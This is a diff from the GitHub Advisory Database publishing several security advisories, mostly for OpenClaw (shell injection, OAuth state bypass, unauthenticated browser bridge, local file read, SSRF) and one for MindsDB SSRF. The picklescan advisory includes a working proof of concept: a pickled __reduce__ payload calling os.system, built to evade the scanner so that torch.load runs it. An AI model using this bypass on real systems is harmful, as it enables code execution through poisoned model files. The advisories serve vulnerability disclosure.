advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json new file mode 100644 index 0000000000000..48068a265fa55 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json @@ -0,0 +1,75 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4564-pvr2-qq4h", + "modified": "2026-02-18T17:39:00Z", + "published": "2026-02-18T17:39:00Z", + "aliases": [], + "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", + "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15924" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/66d7178f2d6f9d60abad35797f97f3e61389b70c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/9dce3d8bf83f13c067bc3c32291643d2f1f10a06" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b908388245764fb3586859f44d1dff5372b19caf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:39:00Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json b/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json new file mode 100644 index 0000000000000..ef9734b768201 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-7rcp-mxpq-72pj/GHSA-7rcp-mxpq-72pj.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7rcp-mxpq-72pj", + "modified": "2026-02-18T17:41:00Z", + "published": "2026-02-18T17:41:00Z", + "aliases": [], + "summary": "OpenClaw Chutes manual OAuth state validation bypass can cause credential substitution", + "details": "## Summary\n\nThe manual Chutes OAuth login flow could accept attacker-controlled callback input in a way that bypassed OAuth CSRF state validation, potentially resulting in credential substitution.\n\n## Impact\n\nIf an attacker can convince a user to paste attacker-provided OAuth callback data during the manual login prompt, OpenClaw may exchange an attacker-obtained authorization code and persist tokens for the wrong Chutes account.\n\nThe automatic local callback flow is not affected (it validates state in the local HTTP callback handler).\n\n## Affected Packages / Versions\n\n- `openclaw` (npm): `<= 2026.2.13` when using the manual Chutes OAuth login flow.\n\n## Fix\n\nThe manual flow now requires the full redirect URL (must include `code` and `state`), validates the returned `state` against the expected value, and rejects code-only pastes.\n\n## Fix Commit(s)\n\n- a99ad11a4107ba8eac58f54a3c1a8a0cf5686f47\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7rcp-mxpq-72pj" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/a99ad11a4107ba8eac58f54a3c1a8a0cf5686f47" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:41:00Z", + "nvd_published_at": null + } +} \ No newline at end of file From 175bf9cac5b7529888405cc533d680f8a7e95f9b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:43:25 +0000 Subject: [PATCH 157/215] Publish GHSA-jfv4-h8mc-jcp8 --- .../GHSA-jfv4-h8mc-jcp8.json | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json diff --git a/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json new file mode 100644 index 0000000000000..95b14dd073959 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-jfv4-h8mc-jcp8/GHSA-jfv4-h8mc-jcp8.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfv4-h8mc-jcp8", + "modified": "2026-02-18T17:41:09Z", + "published": "2026-02-18T17:41:09Z", + "aliases": [], + "summary": "OpenClaw: Process Safety - Unvalidated PID Kill via SIGKILL in Process Cleanup", + "details": "## Summary\n\nOpenClaw CLI process cleanup used system-wide process enumeration and pattern matching to terminate processes without verifying they were owned by the current OpenClaw process. On shared hosts, unrelated processes could be terminated if they matched the pattern.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `< 2026.2.14` (including the latest published version `2026.2.13`)\n- Fixed: `2026.2.14` (planned next release)\n\n## Details\n\nThe CLI runner cleanup helpers could kill processes matched by command-line patterns without validating process ownership.\n\n## Fix\n\nProcess cleanup is now scoped to owned processes only by filtering to direct child PIDs of the current process (`ppid == process.pid`) before sending signals.\n\nHardening follow-ups:\n- Prefer graceful termination for resume cleanup (`SIGTERM`, then `SIGKILL` fallback).\n- Reduce false negatives from `ps` argv truncation by preferring wide output (`ps -axww`) with a fallback.\n- Tighten command-line token matching to avoid substring matches.\n\n## Fix Commit(s)\n\n- 6084d13b956119e3cf95daaf9a1cae1670ea3557\n- eb60e2e1b213740c3c587a7ba4dbf10da620ca66\n\n## Release Process Note\n\nThis advisory is pre-set with patched version `2026.2.14`. After `2026.2.14` is published to npm, the remaining step should be to publish this advisory.\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jfv4-h8mc-jcp8" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6084d13b956119e3cf95daaf9a1cae1670ea3557" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/eb60e2e1b213740c3c587a7ba4dbf10da620ca66" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-283" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:41:09Z", + "nvd_published_at": null + } +} \ No newline at end of file From 600a0a3c8cbe3424156c908e73c8eebb9b38af90 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:46:16 +0000 Subject: [PATCH 158/215] Publish Advisories GHSA-97f8-7cmv-76j2 GHSA-h9g4-589h-68xv GHSA-rwj8-p9vq-25gv GHSA-x22m-j5qq-j49m --- .../GHSA-97f8-7cmv-76j2.json | 59 +++++++++++++++ .../GHSA-h9g4-589h-68xv.json | 71 +++++++++++++++++++ .../GHSA-rwj8-p9vq-25gv.json | 67 +++++++++++++++++ .../GHSA-x22m-j5qq-j49m.json | 67 +++++++++++++++++ 4 files changed, 264 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json diff --git a/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json b/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json new file mode 100644 index 0000000000000..b8af51a354c0f --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json @@ -0,0 +1,59 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97f8-7cmv-76j2", + "modified": "2026-02-18T17:45:52Z", + "published": "2026-02-18T17:45:52Z", + "aliases": [], + "summary": "Picklescan (scan_pytorch) Bypass via dynamic eval MAGIC_NUMBER", + "details": "### Summary\nThis is a scanning bypass to `scan_pytorch` function in `picklescan`. As we can see in the implementation of [get_magic_number()](https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/torch.py#L76C5-L84) that uses `pickletools.genops(data)` to get the `magic_number` with the condition `opcode.name` includes `INT` or `LONG`, but the PyTorch's implemtation simply uses [pickle_module.load()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1797) to get this `magic_number`. For this implementation difference, we then can embed the `magic_code` into the `PyTorch` file via dynamic `eval` on the `\\_\\_reduce\\_\\_` trick, which can make the `pickletools.genops(data)` cannot get the `magic_code` in `INT` or `LONG` type, but the `pickle_module.load()` can still return the same `magic_code`, eading to a bypass.\n\n### PoC\n#### Attack Step 1\nwe can edit the source code of the function [\\_legacy\\_save()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1120) as follows:\n```Python\n class payload:\n def __reduce__(self):\n return (eval, ('MAGIC_NUMBER',))\n\n pickle_module.dump(payload(), f, protocol=pickle_protocol)\n```\n#### Attack Step 2\nwith the modified version of `PyTorch`, we run the following PoC to generate the `payload.pt`:\n```Python\nimport torch \n\nclass payload:\n def __reduce__(self):\n return (__import__('os').system, ('touch /tmp/hacked',))\n\ntorch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)\n```\n\n#### Picklescan result\n```\nERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356\n----------- SCAN SUMMARY -----------\nScanned files: 0\nInfected files: 0\nDangerous globals: 0\n```\n\n#### Victim Step\n```Python\nimport torch\ntorch.load('./payload.pt', weights_only=False)\n```\nthen you can find the illegal file `/tmp/hacked` created in your local system.\n\n### Impact\nCraft malicious `PyTorch` payloads to bypass `picklescan`, then recall ACE/RCE.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "picklescan" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-97f8-7cmv-76j2" + }, + { + "type": "WEB", + "url": "https://github.com/mmaitre314/picklescan/commit/b9997634683a4f4bd0c7e3701e7ce7e90fe70e8c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mmaitre314/picklescan" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:45:52Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json b/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json new file mode 100644 index 0000000000000..5b9c08f0000c3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json @@ -0,0 +1,71 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h9g4-589h-68xv", + "modified": "2026-02-18T17:45:31Z", + "published": "2026-02-18T17:45:31Z", + "aliases": [], + "summary": "OpenClaw has an authentication bypass in sandbox browser bridge server", + "details": "## Summary\n\nopenclaw could start the sandbox browser bridge server without authentication.\n\nWhen the sandboxed browser is enabled, openclaw runs a local (loopback) HTTP bridge that exposes browser control endpoints (for example `/profiles`, `/tabs`, `/tabs/open`, `/agent/*`). Due to missing auth wiring in the sandbox initialization path, that bridge server accepted requests without requiring gateway auth.\n\n## Impact\n\nA local attacker (any process on the same machine) could access the bridge server port and:\n\n- enumerate open tabs and retrieve CDP WebSocket URLs\n- open/close/navigate tabs\n- execute JavaScript in page contexts via CDP\n- exfiltrate cookies/session data and page contents from authenticated sessions\n\nThis is a localhost-only exposure (CVSS AV:L), but provides full browser-session compromise for sandboxed browser usage.\n\n## Affected Versions\n\n- Introduced in: `2026.1.29-beta.1` (first npm release that shipped the sandbox browser bridge)\n- Affected range: `>=2026.1.29-beta.1 <2026.2.14`\n\n## Patched Versions\n\n- `2026.2.14`\n\n## Mitigation\n\n- Upgrade to `2026.2.14` (recommended).\n- Or disable the sandboxed browser (`agents.defaults.sandbox.browser.enabled=false`).\n\n## Fix Details\n\n- The sandbox browser bridge server now always requires auth and enforces the same gateway browser control auth (token/password) that loopback browser clients already use.\n- Additional hardening: bridge server refuses non-loopback binds; local helper servers are bound to loopback.\n- Added regression tests (including unit coverage for per-port bridge auth fallback).\n\nFix commits:\n\n- openclaw/openclaw@4711a943e30bc58016247152ba06472dab09d0b0\n- openclaw/openclaw@6dd6bce997c48752134f2d6ed89b27de01ced7e3\n- openclaw/openclaw@cd84885a4ac78eadb7bf321aae98db9519426d67\n## Credits\n\nThanks to Adnan Jakati (@jackhax) of [Praetorian](https://www.praetorian.com/) for reporting this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.29-beta.1" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h9g4-589h-68xv" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/4711a943e30bc58016247152ba06472dab09d0b0" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6dd6bce997c48752134f2d6ed89b27de01ced7e3" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/cd84885a4ac78eadb7bf321aae98db9519426d67" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:45:31Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json b/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json new file mode 100644 index 0000000000000..643dd48b64b4f --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwj8-p9vq-25gv", + "modified": "2026-02-18T17:44:58Z", + "published": "2026-02-18T17:44:58Z", + "aliases": [], + "summary": "OpenClaw has a LFI in BlueBubbles media path handling", + "details": "### Summary\nThe BlueBubbles extension accepted attacker-controlled local filesystem paths via `mediaPath` and could read arbitrary local files from disk before sending them as media attachments.\n\n### Details\nWhen `sendBlueBubblesMedia` received a non-HTTP media source, the previous implementation resolved it to a local path and read it directly from disk. There was no required allowlist of safe directories, so values like `/etc/passwd` (or equivalent sensitive paths on other platforms) could be requested and exfiltrated.\n\nThe fix hardens local media loading by requiring explicit configured roots (`channels.bluebubbles.mediaLocalRoots`) and by enforcing canonical-path containment checks before reading local files. Paths outside allowed roots are rejected.\n\nFix PR: https://github.com/openclaw/openclaw/pull/16322\nFix commit: https://github.com/openclaw/openclaw/commit/71f357d9498cebb0efe016b0496d5fbe807539fc\n\n### Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< v2026.2.14`\n- Fixed: `>= v2026.2.14` (planned)\n\n### Impact\nAn attacker able to trigger BlueBubbles media sends could exfiltrate local files accessible to the OpenClaw process.\n\n### Remediation\nUpgrade to a release that includes commit `71f357d9498cebb0efe016b0496d5fbe807539fc` and configure `channels.bluebubbles.mediaLocalRoots` to explicit trusted directories.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rwj8-p9vq-25gv" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/16322" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/71f357d9498cebb0efe016b0496d5fbe807539fc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:44:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json b/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json new file mode 100644 index 0000000000000..f469774848c76 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x22m-j5qq-j49m", + "modified": "2026-02-18T17:45:12Z", + "published": "2026-02-18T17:45:12Z", + "aliases": [], + "summary": "OpenClaw has two SSRF via sendMediaFeishu and markdown image fetching in Feishu extension", + "details": "### Summary\nThe Feishu extension could fetch attacker-controlled remote URLs in two paths without SSRF protections:\n\n- `sendMediaFeishu(mediaUrl)`\n- Feishu DocX markdown image URLs (write/append -> image processing)\n\n### Affected versions\n- `< 2026.2.14`\n\n### Patched versions\n- `>= 2026.2.14`\n\n### Impact\nIf an attacker can influence tool calls (directly or via prompt injection), they may be able to trigger requests to internal services and re-upload the response as Feishu media.\n\n### Remediation\nUpgrade to OpenClaw `2026.2.14` or newer.\n\n### Notes\nThe fix routes Feishu remote media fetching through hardened runtime helpers that enforce SSRF policies and size limits.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x22m-j5qq-j49m" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/16285" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/5b4121d6011a48c71e747e3c18197f180b872c5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:45:12Z", + "nvd_published_at": null + } +} \ No newline at end of file From 51aad82d6223f946c3a0f0dab3ff2852d7b143a9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 17:48:30 +0000 Subject: [PATCH 159/215] Publish GHSA-6xw9-2p64-7622 --- .../GHSA-6xw9-2p64-7622.json | 37 +++++++++++++++---- 1 file changed, 29 insertions(+), 8 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json (70%) diff --git a/advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json b/advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json similarity index 70% rename from advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json rename to advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json index fad76fe75e122..4b5c170ad0b05 100644 --- a/advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json +++ b/advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json @@ -1,12 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-6xw9-2p64-7622", - "modified": "2026-02-16T06:31:29Z", + "modified": "2026-02-18T17:47:09Z", "published": "2026-02-16T06:31:29Z", "aliases": [ "CVE-2026-2531" ], - "details": "A security vulnerability has been detected in MindsDB up to 25.14.1. This vulnerability affects the function clear_filename of the file mindsdb/utilities/security.py of the component File Upload. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 74d6f0fd4b630218519a700fbee1c05c7fd4b1ed. It is best practice to apply a patch to resolve this issue.", + "summary": "MindsDB affected by a SSRF vulnerability", + "details": "A security vulnerability has been detected in MindsDB up to 25.14.1. This vulnerability affects the function clear_filename of the file mindsdb/utilities/security.py of the component File Upload. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.", "severity": [ { "type": "CVSS_V3", @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "MindsDB" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "25.14.1" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -36,7 +57,7 @@ "url": "https://github.com/themavik/mindsdb/commit/74d6f0fd4b630218519a700fbee1c05c7fd4b1ed" }, { - "type": "WEB", + "type": "PACKAGE", "url": "https://github.com/mindsdb/mindsdb" }, { @@ -56,9 +77,9 @@ "cwe_ids": [ "CWE-918" ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:47:09Z", "nvd_published_at": "2026-02-16T04:15:51Z" } } \ No newline at end of file From 5b7321cdfff9966c097a7ed8b37fd1220badb3b3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 18:32:01 +0000 Subject: [PATCH 160/215] Advisory Database Sync --- .../GHSA-4gm2-v7j4-74p8.json | 13 ++- .../GHSA-2764-3pqr-49w6.json | 3 +- .../GHSA-9cmp-2g73-ff98.json | 1 + .../GHSA-qhp7-446p-xq88.json | 1 + .../GHSA-xr9j-c7v6-7542.json | 1 + .../GHSA-v727-f437-6cxx.json | 1 + .../GHSA-prhq-c3gx-jhwg.json | 3 +- .../GHSA-2whf-r4r4-c662.json | 2 +- .../GHSA-365g-rr2h-rx65.json | 37 +++++++ .../GHSA-3cgw-cpcx-p7g4.json | 4 +- .../GHSA-3w2g-4qx3-2mmw.json | 41 ++++++++ .../GHSA-4mcw-fcqm-vqg3.json | 56 +++++++++++ .../GHSA-4v8p-q39m-4pj8.json | 36 +++++++ .../GHSA-4vmx-r9fj-4cm5.json | 36 +++++++ .../GHSA-55vh-w3p8-qq9g.json | 33 +++++++ .../GHSA-5jgq-pv8m-5cx7.json | 33 +++++++ .../GHSA-5pqm-c33h-22jc.json | 33 +++++++ .../GHSA-5q5x-wqxc-vv25.json | 40 ++++++++ .../GHSA-5qf3-3gp9-pjx6.json | 41 ++++++++ .../GHSA-5qq8-6gv4-wmcc.json | 36 +++++++ .../GHSA-636r-hfj8-v9m7.json | 6 +- .../GHSA-64jv-v62f-2xrg.json | 36 +++++++ .../GHSA-6rjp-j8mc-4f57.json | 60 ++++++++++++ .../GHSA-6xrx-3vj8-2rjc.json | 33 +++++++ .../GHSA-74jq-6q38-p5wf.json | 1 + .../GHSA-74rw-28vp-8wh9.json | 6 +- .../GHSA-78xc-39m5-v2c6.json | 37 +++++++ .../GHSA-7fjm-558r-4j8r.json | 38 ++++++++ .../GHSA-7p94-766c-hgjp.json | 36 +++++++ .../GHSA-85h6-5m3v-gx37.json | 15 ++- .../GHSA-876r-52fj-4pxf.json | 41 ++++++++ .../GHSA-8j5g-3q2r-xfjh.json | 37 +++++++ .../GHSA-8rh3-rvv2-3mr4.json | 3 +- .../GHSA-8rqj-9226-cwx7.json | 33 +++++++ .../GHSA-9pjv-cqr5-4xh7.json | 96 +++++++++++++++++++ .../GHSA-9wwr-2jh3-482p.json | 41 ++++++++ .../GHSA-c56r-fcf4-6rp2.json | 10 +- .../GHSA-chpq-fr33-gp2m.json | 40 ++++++++ .../GHSA-f2fg-5m3g-hqwv.json | 36 +++++++ .../GHSA-f5pv-9whq-7mv7.json | 36 +++++++ .../GHSA-f7cx-4c4g-9g59.json | 6 +- .../GHSA-f7pj-q7w5-89fg.json | 41 ++++++++ .../GHSA-fqrv-m9rv-j33j.json | 36 +++++++ .../GHSA-g3vh-wfh4-fp76.json | 33 +++++++ .../GHSA-g4wf-v389-9w53.json | 2 +- .../GHSA-h437-rr98-fx56.json | 37 +++++++ .../GHSA-hcrc-x9p4-f9jh.json | 38 ++++++++ .../GHSA-hxp3-qj63-m9j9.json | 4 +- .../GHSA-j6h2-wr53-6vcg.json | 41 ++++++++ .../GHSA-j87r-wgfm-7fjj.json | 41 ++++++++ .../GHSA-jggw-c47g-3w3q.json | 6 +- .../GHSA-jp99-8xc8-367m.json | 33 +++++++ .../GHSA-m34c-wrf8-mw69.json | 41 ++++++++ 